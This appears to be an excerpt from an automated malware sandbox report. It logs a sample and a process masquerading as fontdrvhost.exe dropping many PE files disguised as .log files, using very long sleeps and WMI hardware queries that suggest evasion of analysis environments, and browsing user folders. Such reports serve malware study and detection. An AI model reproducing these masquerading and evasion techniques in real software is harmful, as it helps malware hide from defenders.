                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\TlbPEPXm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\rrvChBIx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\GGiHtSpS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZbufrXkm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\qguCdZEu.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\dabMNWxu.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ouGCZwUD.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\DEcjsSrF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\cixmEAyA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\MTLhtkSf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\DdBAnNSZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\UOaorzbP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\xgyKnYKq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\gmudUmpb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\PwAgeDiA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OnJqPAWm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\QfCxRbIn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\NMMXsbef.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\rmtKjMmm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\MPlPWbPk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\RMaOjKxV.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\AFOsBjYP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OjpXkDnJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\XEIwxBIS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\MHvzAhUM.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\rAfUMkjC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\oQWKeSDj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\WYfWtHNc.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\RCCOzYeY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\GPSaXBQY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\HxFJRUCD.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\iJlVzTXF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ifAdEpGk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\IHwzgXOR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\COTaDrJc.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\kdNuDPIk.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\pJXAdKPi.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\xkYbKhNl.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\xHZssejW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\phJkSByL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\qiEMTywj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\kMzdwiuP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\lHCvjEeO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\blWejAjG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\XzFFzMmI.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\NWMxEuQr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\mCNvXUiC.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\XFfNnXVZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZklVGaxA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\FWzHsBqG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OEWHVhjH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\NgoGZspx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\iANVPgEI.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\xvPIrmGV.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\nJvbxzCb.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\tqrrAUxf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\PEqxAxdY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\JAxqeOaQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OemrfNDp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\TCIWpNeY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\IiRYzRio.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\YUSxJEkf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zfzIrCEh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\SbqYhYfr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\SdGfOIqy.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\TYRgCYum.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\LtTWIWgh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\aVjDvRpd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\MMDorhKp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\JfyqGcCs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\WgOpYqoh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\KjbhtTTT.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\kQZvTrxL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ylQifTUJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\aFyNQRuY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\sihlzJJp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\WzsNMHNJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\uHokLZDZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zReaumVj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\kUpuTdpn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\uvZrYWTP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\jECTfuuL.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\DnshUSLJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ULtOMFWU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\iKNvbzqU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\msUTDNPI.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\zsrQNmVQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\uJzjHyIX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\dKmMwLxf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OzZYIDTF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\fqGCEpSY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\FWXhQVXq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\QpCXcuuA.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\SKewgrff.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\sQxsIGwX.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\wHLAFYKX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\sXAbZyyE.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\nHlSHaLn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\fyqViYtd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\sYhLnqXd.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\XxwvJouT.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\KnZYovDz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zuGjoWSN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\fvxnZIOH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\inpEUjnz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\XsyMwKeS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\mJblSiJK.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\dpYUmTzI.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OgxpbmIn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\rudcNvNr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\wsOrhbIJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\hsmnhNDB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZtZwWUdP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ORiFVhtH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CQeYyQPa.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zzDSBAiP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ikDUDecv.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\WuogHSdp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\YOQFKOOU.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe TID: 6644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7268Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 5004Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7532Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7880Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7788Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8124Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 3512Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 2520Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 6092Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 5728Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7320Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7696Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8048Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7552Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 4628Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7284Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8080Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
